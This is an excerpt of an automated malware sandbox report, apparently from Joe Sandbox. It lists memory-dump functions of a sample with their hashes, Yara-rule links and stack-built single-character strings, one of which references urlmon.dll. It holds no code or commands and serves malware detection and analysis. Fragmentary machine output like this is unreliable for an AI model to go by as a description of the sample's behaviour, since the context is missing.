Function 0401F7C4 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

0@1`OZ, xrefs: 0401F848, 0401F84B

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: 0@1`OZ
API String ID: 0-290734467
Opcode ID: 8afe4f2321f64ba4796ca30aaaee708fad65e85c89db2eeb4f9d6d0073481a66
Instruction ID: 38eaf2fb6c3f81b4da01c217b046b5818f65a4466abfedfc784f57661340209f
Opcode Fuzzy Hash: 8afe4f2321f64ba4796ca30aaaee708fad65e85c89db2eeb4f9d6d0073481a66
Instruction Fuzzy Hash: DE21F1B6D01219AF8B44DFA9D8419EFB7F9EF88210F14426AE919E7240E7705A15CBE0

Function 04020614 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

^_, xrefs: 0402066D

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: ^_
API String ID: 0-2654285376
Opcode ID: a9caf25f8449b3d33cec15f0c19e137ab8f5f741e5a287e0ae5cd6a854918423
Instruction ID: 15ba7308c77b30e965db097f9246c17bac80ccc42fbf11541c5c919c3eb40350
Opcode Fuzzy Hash: a9caf25f8449b3d33cec15f0c19e137ab8f5f741e5a287e0ae5cd6a854918423
Instruction Fuzzy Hash: 971100B6D01218AFCB04DFA9D8409EEB7F9EF48210F14416AE919F7240E7715A048FA1

Function 0401FF24 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

\, xrefs: 0401FF7D

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: \
API String ID: 0-3568076253
Opcode ID: 6f252628e3fed3920560bdee6e2b6ad4e36071794e146074a52a0a9ac5223ece
Instruction ID: 6f591c68a888d5c6542be08e4b370ad25046ac0b6eb89fb21ccebae0573ec669
Opcode Fuzzy Hash: 6f252628e3fed3920560bdee6e2b6ad4e36071794e146074a52a0a9ac5223ece
Instruction Fuzzy Hash: 55111CB6D01218AF8F40DFA9D9409EEB7F9EF89210F04816AE919F7240E7705A05CBA0

Function 03FFD714 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eda5a37268b646a4e9176247de083d00ead4b908f07e88166b65f32b0248633
Instruction ID: a033b6f1edb708ac7115e7d7bd9d74ac3d345870f7bb23a1e1be7496e13b79b9
Opcode Fuzzy Hash: 1eda5a37268b646a4e9176247de083d00ead4b908f07e88166b65f32b0248633
Instruction Fuzzy Hash: 5A41EDB1D11229AFDB04CF99CC81AEEBBBCEF49714F10415AFA14E6244E7B19640CBA4

Function 03FFD708 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4bba4c11e847853e50e457391dc1c65136ecd79693e72ae95c125e428e2597f
Instruction ID: fa7b1ebf95ad4344bef3ac1b14f672aa38eebd2491571b8717cd025dcf1066ac
Opcode Fuzzy Hash: f4bba4c11e847853e50e457391dc1c65136ecd79693e72ae95c125e428e2597f
Instruction Fuzzy Hash: 643101B1D11219AFDB14CF99C881AEFBBBCEF49614F10415AFE18EB254D3709641CBA1

Function 04022FF4 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea2428072a025ba2a1a5e5edf7e755ee5bfa71c8a23ee288ff029ed2152de8b
Instruction ID: 36c7c1ae264361341cd14db12789d74ccd43c0ceb420945d6d9ea2c742fef688
Opcode Fuzzy Hash: eea2428072a025ba2a1a5e5edf7e755ee5bfa71c8a23ee288ff029ed2152de8b
Instruction Fuzzy Hash: 6031DEB5A01248ABDB14DF98D880EEFB7B9AF8C304F108209F919A7240D730A945CBA4

Function 04023164 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96ce1d5a4959f655bcaffb69e89d6b1eaf8cb4615728a1e350bab85d853e7db
Instruction ID: 1ad45909fb0a23c2fbad0084ab320bf02ddeabc997a1a851f7324b32ec72cb27
Opcode Fuzzy Hash: a96ce1d5a4959f655bcaffb69e89d6b1eaf8cb4615728a1e350bab85d853e7db
Instruction Fuzzy Hash: C631F2B5A00608AFDB14DF98D880EEFB7B9EF88314F108209FD19A7240D730A915CFA1

Function 04022A24 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2286169e7d239127065d9da43f726a014485e68f18b51b3bf2f2968b75b5837
Instruction ID: 3196514c041a80ad00721be0337d5cb87d28ec7f13b0d3d78c4b80b7ba1821c7
Opcode Fuzzy Hash: f2286169e7d239127065d9da43f726a014485e68f18b51b3bf2f2968b75b5837
Instruction Fuzzy Hash: 67311CB5A00658ABDB14DF99CC41EEFB7B9EF88304F108209FD59A7240D774A915CFA1

Function 04023394 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd06ed74be3549eab4e2d8ea5358b5a0544af042e744dcf0a7d3a1874b2dea97
Instruction ID: 77729cac896cbf816f2451a9825b396b01255e440b8999b956b1a0422e25e4b1
Opcode Fuzzy Hash: bd06ed74be3549eab4e2d8ea5358b5a0544af042e744dcf0a7d3a1874b2dea97
Instruction Fuzzy Hash: A8212FB5900658AFDB14DF94DC41EEF77B8EF88304F108109FD19AB281D774A955CBA1

Function 04011E44 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f5883f10121c34d0773cea85cb878c6b400389d4cd6fd030fc21eda8ed60a39
Instruction ID: de8754bd5b69085de43c0bd38604b32273a573f180db13b3e3970d455a57012a
Opcode Fuzzy Hash: 3f5883f10121c34d0773cea85cb878c6b400389d4cd6fd030fc21eda8ed60a39
Instruction Fuzzy Hash: 551173B23802257AF720AA559C82FAB779CDB84B19F244015FF04BE2C1D6B5B91146B8

Function 040226B4 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1741ed4842453a49dba2c3799f6a288127682926c8c476ff624270c335da70ba
Instruction ID: d0a16efab1e09570cabf3c95957f673f0ef497be9a5576b49152316395f787f1
Opcode Fuzzy Hash: 1741ed4842453a49dba2c3799f6a288127682926c8c476ff624270c335da70ba
Instruction Fuzzy Hash: 8C114F71901255ABEB10EF94CC41FEFB3A8EF85704F004549FA19AB281D7746915CBA1

Function 04022834 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a2a4f9c2d5f98ffd014c402f2ae7f8546cf75c4a92a39ab2868a2a3f0f582
Instruction ID: 093a05e10524bd6b4b2d1d94bcc986c14f4ac260c9d1b3547722dbe5cfefa156
Opcode Fuzzy Hash: b20a2a4f9c2d5f98ffd014c402f2ae7f8546cf75c4a92a39ab2868a2a3f0f582
Instruction Fuzzy Hash: FA118E71A012546BEB10EFA48C41FEF77A8EF89318F008509FE59AB281D7746905CBA1

Function 0401F2D4 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41a9870c871dd71e14966ab36307e2c55632a33ca0c8f58ecad51cc254e08b5
Instruction ID: a1faed65a17e78cb779f480d668c112de7ad2d847aed713d44557f347bc15cd5
Opcode Fuzzy Hash: c41a9870c871dd71e14966ab36307e2c55632a33ca0c8f58ecad51cc254e08b5
Instruction Fuzzy Hash: 7B2130F6D01218AF8B00DFA9D8409EFB7F9EF88200F00415AE919E7200E7705A14CBE1

Function 0401B5E4 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe65fcdb04d0db6960565602150dc244803bfd115f064a0b54bd17db4592c38
Instruction ID: 2c977fcead0fd1f1e4451872c204298d570ba15126a5ecb579da5b2fbdb0eca2
Opcode Fuzzy Hash: abe65fcdb04d0db6960565602150dc244803bfd115f064a0b54bd17db4592c38
Instruction Fuzzy Hash: 160196B6A002343BF710EA64DC45EEFB36CEF54218F000255FE18A7281FA747E5186E5

Function 040236F4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e435a6d5760374a335785b87ca83361a46a41028353d2aab8a404cd5dfa50f94
Instruction ID: e5671837aa5a8f9f8a4030b863c8f140858e7a7931b3af9aaeb42461d82c8b90
Opcode Fuzzy Hash: e435a6d5760374a335785b87ca83361a46a41028353d2aab8a404cd5dfa50f94
Instruction Fuzzy Hash: E2018CB2205208BFDB44DE99DC81EEB77ADAF8D754F408208FA59A7241D630F8518BA4

Function 0401F244 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c207513d95081725962bbaf760e0a4ee8315d6be1bbf36435b61e68edf34a3
Instruction ID: 7f740ad440fd44c6a73d5b30144785d0b52b9344be73991f183081148622b7c2
Opcode Fuzzy Hash: c7c207513d95081725962bbaf760e0a4ee8315d6be1bbf36435b61e68edf34a3
Instruction Fuzzy Hash: F501DBF6C01219AFDB40DFE8D940AEEBBF9AB58200F14456AE915F7240F7715A048FA0

Function 03FFD864 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0420423703af43a7551520ff8d77777a3b3ee807f11241a985a40f2086348913
Instruction ID: edd2099d6cb249b6e5d09c3cd1c31dbc9233f3611d95bbd2d2ce629546e73856
Opcode Fuzzy Hash: 0420423703af43a7551520ff8d77777a3b3ee807f11241a985a40f2086348913
Instruction Fuzzy Hash: A5F0A773A002166BD7149E6DAC44B8AF79CEF85738F240222FF1CDB2A1D671E451C2A0

Function 04011FFE Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949a1fd885e707e57ccd22e2a6c5e752b482f28f0682a7face9a80d35d438479
Instruction ID: 7ba458e1345ccf8b15798d04c880c068fb1b5cc8a9578d10a1397dd0fe33cfec
Opcode Fuzzy Hash: 949a1fd885e707e57ccd22e2a6c5e752b482f28f0682a7face9a80d35d438479
Instruction Fuzzy Hash: E9F09671D112186AFF60DBA8DC48EFEB778DB88758F104289E90C77190D6706D418B61

Function 04022934 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4371045678c4aa0409ef51d182ee17da1efa9964dd5f09547e9c377c2e487692
Instruction ID: 6c2188e17801effd3c7f9885d03ea3d7799ece5d2bbf9c169f9b047dc195c4c0
Opcode Fuzzy Hash: 4371045678c4aa0409ef51d182ee17da1efa9964dd5f09547e9c377c2e487692
Instruction Fuzzy Hash: C6F01CB62002197FDB10EF99DC81EDB77ADEF89714F108409BE18A7241D674BD518BB4

Function 04023614 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f9bc99cc8ac4f978a5b5e6b0b32a95f3fdda044b64acff3cddb5f14e22cbbd
Instruction ID: 24b6bdc87b2be794ce77af7f3f36767d460f80a400aa67c61e2ee6f328a900f1
Opcode Fuzzy Hash: 93f9bc99cc8ac4f978a5b5e6b0b32a95f3fdda044b64acff3cddb5f14e22cbbd
Instruction Fuzzy Hash: B4E06D722003147FDA10EE59DC44EDB37ACDF89714F004018FD08AB241C630B8108AB4

Function 04023664 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38173da8966e600dc58c9d2b70ac7ec8ac4f1b5dce13e74e74fc05643b0fe2e8
Instruction ID: 1f39fa3c7392f21f4d973df4cd53dc33d9cc066512af9a3fbb71af1f3ae0975c
Opcode Fuzzy Hash: 38173da8966e600dc58c9d2b70ac7ec8ac4f1b5dce13e74e74fc05643b0fe2e8
Instruction Fuzzy Hash: 86E065B26402547BEA20EF59DC41E9B37ACEFC9718F004408FA08AB242C771B810CAB4

Function 04011F64 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef824472df1e88185e042834c8d91a63518aa5b2d82f51912c2b2d570a1fa77e
Instruction ID: 0e8d9e60e930906ad31bb13ec34325c6a9c339f6d30d910d77eeb4195189293c
Opcode Fuzzy Hash: ef824472df1e88185e042834c8d91a63518aa5b2d82f51912c2b2d570a1fa77e
Instruction Fuzzy Hash: 2DF05E71805208ABDB18DFA4D841BDDBBB4EB04324F1043ADE9249B280E634A7509781

Function 040254B4 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0e43b636e997cf7e5385392be2f43f72c4f5e486c06b94ee16a84aec754dd2
Instruction ID: e89c83cebfd0670c3bb13127777bc9e3932f331c625e65e3a33080e28f15fc96
Opcode Fuzzy Hash: aa0e43b636e997cf7e5385392be2f43f72c4f5e486c06b94ee16a84aec754dd2
Instruction Fuzzy Hash: 3CE04F32A0067437D62055999D06FABF7AC9BC5A69F054124FF08AB380E565B90086E8

Function 04011F62 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766a46ce46d25dc05001189f11add72bd9941fa25a6de3abe15a5410987bea36
Instruction ID: f43ca00128214c946d09041db45652305c6a2ae56e946bc0e079ee481887e0bf
Opcode Fuzzy Hash: 766a46ce46d25dc05001189f11add72bd9941fa25a6de3abe15a5410987bea36
Instruction Fuzzy Hash: 1BE06D71D19108ABDB08DFA4D841BEDBBA4EB08210F1083ADF918EF290E235EB549781

Function 03FFD861 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac51e53a73b62c851ca4702b7fceb393dc8472f06f23574a24c2f2166567e787
Instruction ID: e5324465225575501e90e1b268afb449f4dbdcb9be9a25a77b04e8e8b1761fd4
Opcode Fuzzy Hash: ac51e53a73b62c851ca4702b7fceb393dc8472f06f23574a24c2f2166567e787
Instruction Fuzzy Hash: 21E086739001125F87149A5D9C809C6F799EB897353250321FA6D97270D6319811C690

Function 040232F4 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97dec5b74be4aedb3c1181ed5c32ed08843b18dee4068410edbffac1a536c693
Instruction ID: 9106a5509a291d6a2773455a08d60d8d82541e8c1cd4dcc29bcc2b30004cd977
Opcode Fuzzy Hash: 97dec5b74be4aedb3c1181ed5c32ed08843b18dee4068410edbffac1a536c693
Instruction Fuzzy Hash: 63E08C362006147BEA20FB6ADC41FDB776CDFC5728F004019FA1CAB281C671B9048BB4

Function 040253D4 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79de1e15aecca4852e6a2605c3ed8ce2dc3f3a9f9d57891c81fe2282d8357f92
Instruction ID: 9c3ad882e361df79aa55685cb7abcdf281c3d9bf89e651380e4b8e35f84180b5
Opcode Fuzzy Hash: 79de1e15aecca4852e6a2605c3ed8ce2dc3f3a9f9d57891c81fe2282d8357f92
Instruction Fuzzy Hash: CAC080716003087FD700DA9CCC46F69339C9708514F004040BF0C8B381E575F9104754

Function 04004C94 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3a29bf2c2af7b955cdc3e28cc9df8305d8a35b12ed186b3bd0cb90bc44683d
Instruction ID: dda552f51d35c9bd9f9548bd33da32f663d2246fa4c3d16663c6639e28345c34
Opcode Fuzzy Hash: 4e3a29bf2c2af7b955cdc3e28cc9df8305d8a35b12ed186b3bd0cb90bc44683d
Instruction Fuzzy Hash: A3B0126240954231B7263E3441C0198BD02488B028ED8649056D19938B9153E899C6AB

Non-executed Functions

Function 0401C7E4 Relevance: 35.3, Strings: 28, Instructions: 264COMMON

Download Yara Rule

Strings

H, xrefs: 0401C8B3
$, xrefs: 0401C840
T, xrefs: 0401C8CF
>, xrefs: 0401C822
h, xrefs: 0401C80E
v, xrefs: 0401C818
m, xrefs: 0401C897
i, xrefs: 0401CA86
Q, xrefs: 0401C8BA
., xrefs: 0401CA7F
u, xrefs: 0401C85E
F, xrefs: 0401C8AC
s, xrefs: 0401C872
g, xrefs: 0401C854
F, xrefs: 0401C8C1
5, xrefs: 0401C890
E, xrefs: 0401C8A5
B, xrefs: 0401C8F9
), xrefs: 0401C886
VO=, xrefs: 0401CC4A
%, xrefs: 0401C9CA
w, xrefs: 0401C89E
urlmon.dll, xrefs: 0401CA26, 0401CA29
}, xrefs: 0401C84A
J, xrefs: 0401C900
}, xrefs: 0401C868
$, xrefs: 0401C87C
), xrefs: 0401C82C

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$VO=$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1439727971
Opcode ID: 43eb3919f10b7472c00fceeb68210a2901a1366ddbf72d3a4cb4f49e50445cb8
Instruction ID: 5863fd3080a507b17e16a931f106990aa4a060bbe86cc8eeb3bc8affe4fb4fd9
Opcode Fuzzy Hash: 43eb3919f10b7472c00fceeb68210a2901a1366ddbf72d3a4cb4f49e50445cb8
Instruction Fuzzy Hash: A3C122B1C11268AAEF60DFA4CD44BEEBBB5AF44308F0081D9D50CB7251D7B55A88CF65

Function 04004247 Relevance: 31.4, Strings: 25, Instructions: 158COMMON

Download Yara Rule

Strings

j", xrefs: 0400464A
x, xrefs: 04004380
(S, xrefs: 0400433C
&, xrefs: 04004545
S, xrefs: 040043A8
7, xrefs: 04004454
-, xrefs: 04004408
", xrefs: 04004364
y, xrefs: 04004290
x, xrefs: 040043B2
g, xrefs: 0400427C
x, xrefs: 0400453E
|, xrefs: 04004426
N, xrefs: 040044DF
[X, xrefs: 04004314
*, xrefs: 0400444A
:, xrefs: 0400445E
y>, xrefs: 040043DC
H, xrefs: 04004372
M, xrefs: 04004379
#, xrefs: 040043FE
l, xrefs: 0400439E
fz, xrefs: 0400455C
sy, xrefs: 040042D9
_, xrefs: 040042AE

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: "$#$&$(S$*$-$7$:$H$M$N$S$[X$_$fz$g$j"$l$sy$x$x$y$y>$|$x
API String ID: 0-2386127699
Opcode ID: ab3b15a57791d3897c1b89ca2ce99a0caabac75ef5377ecdc5fb6df3a9255c85
Instruction ID: 02d0a2548d1f996bc46ba6f6b2c17e15a7be49fdf43c634ed63c4576e849e2c4
Opcode Fuzzy Hash: ab3b15a57791d3897c1b89ca2ce99a0caabac75ef5377ecdc5fb6df3a9255c85
Instruction Fuzzy Hash: 21B158B0D05269CBEB24CF85C9587DEBBB0BB05308F1081DAC14C7B281D7BA1A89CF95

Function 040196A4 Relevance: 25.2, Strings: 20, Instructions: 250COMMON

Download Yara Rule

Strings

, xrefs: 0401974C
t, xrefs: 040197A0
x, xrefs: 04019753
m, xrefs: 04019792
t, xrefs: 04019734
r, xrefs: 04019768
i, xrefs: 04019784
l, xrefs: 0401975A
t, xrefs: 04019776
g, xrefs: 040197AE
e, xrefs: 04019745
r, xrefs: 040197A7
r, xrefs: 04019761
\, xrefs: 04019799
l, xrefs: 0401977D
I, xrefs: 0401976F
I, xrefs: 0401972A
2, xrefs: 040197B5
r, xrefs: 0401973E
o, xrefs: 0401978B

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
API String ID: 0-3236418099
Opcode ID: 85c5e102cf263b6dc3082a4ae5c830effed91a36232e2c8cbc16df5e5a285bf9
Instruction ID: fa84626c53fbf6aa5621a357a3b65e20dd83109bbc6693a8e532a6cdf88a002e
Opcode Fuzzy Hash: 85c5e102cf263b6dc3082a4ae5c830effed91a36232e2c8cbc16df5e5a285bf9
Instruction Fuzzy Hash: 979137B1D00228AAEB54DF54CC45FEEB7BDEF44708F404199E60CAA180EB756B85CF65

Function 04014E34 Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

., xrefs: 04014E65
, xrefs: 04014E8E
m, xrefs: 04014ED4
F, xrefs: 04014EDB
r, xrefs: 04014ECD
i, xrefs: 04014E95
o, xrefs: 04014EC6
P, xrefs: 04014EBF
x, xrefs: 04014E6F
o, xrefs: 04014EA3
l, xrefs: 04014EE2
s, xrefs: 04014EE9
e, xrefs: 04014E9C

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: ff55f480296fde18ef4bb409448e2397b81176e87607754ea364e692c4877806
Instruction ID: 5ed77b1bf6043c24956bc38bbe08d8c430736b3cabf6641484060dd274674d9f
Opcode Fuzzy Hash: ff55f480296fde18ef4bb409448e2397b81176e87607754ea364e692c4877806
Instruction Fuzzy Hash: 0C7140B1C10628AAEB15DBE4CD44FEEB778AF4470DF004199E618BB190E77467888FA5

Function 04008AF4 Relevance: 13.8, Strings: 11, Instructions: 84COMMON

Download Yara Rule

Strings

D, xrefs: 04008B7A
w, xrefs: 04008B81
r, xrefs: 04008B3D
